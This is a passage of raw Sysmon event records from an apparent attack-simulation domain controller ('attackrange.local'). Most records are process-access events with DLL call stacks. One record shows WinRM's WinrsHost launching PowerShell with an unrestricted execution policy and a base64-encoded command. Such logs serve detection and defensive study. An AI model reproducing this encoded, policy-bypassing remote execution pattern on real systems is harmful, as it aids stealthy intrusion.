10341000x8000000000000000453Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.446{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000452Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.431{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000451Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.431{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000450Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.431{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000449Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.431{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000448Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.431{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000447Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.431{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000446Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.431{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000445Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.431{5D479F2C-14FE-5F84-0500-000000007E01}6401148C:\Windows\system32\csrss.exe{5D479F2C-167B-5F84-1003-000000007E01}4396C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000444Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.431{5D479F2C-167B-5F84-0E03-000000007E01}50841256C:\Windows\system32\WinrsHost.exe{5D479F2C-167B-5F84-1003-000000007E01}4396C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb 154100x8000000000000000443Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.445{5D479F2C-167B-5F84-1003-000000007E01}4396C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-167B-5F84-41E1-110000000000}0x11e1410HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-167B-5F84-0E03-000000007E01}5084C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000442Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.431{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000441Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.431{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000440Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.431{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000439Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.431{5D479F2C-1507-5F84-1300-000000007E01}13081948C:\Windows\system32\svchost.exe{5D479F2C-167B-5F84-0E03-000000007E01}5084C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000438Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.431{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-167B-5F84-0E03-000000007E01}5084C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000437Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.415{5D479F2C-167B-5F84-0F03-000000007E01}44684280C:\Windows\system32\conhost.exe{5D479F2C-167B-5F84-0E03-000000007E01}5084C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000436Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.415{5D479F2C-14FE-5F84-0500-000000007E01}640656C:\Windows\system32\csrss.exe{5D479F2C-167B-5F84-0F03-000000007E01}4468C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000435Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.399{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000434Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.399{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000433Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.399{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000432Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.399{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000431Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.399{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000430Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.399{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000429Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.399{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000428Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 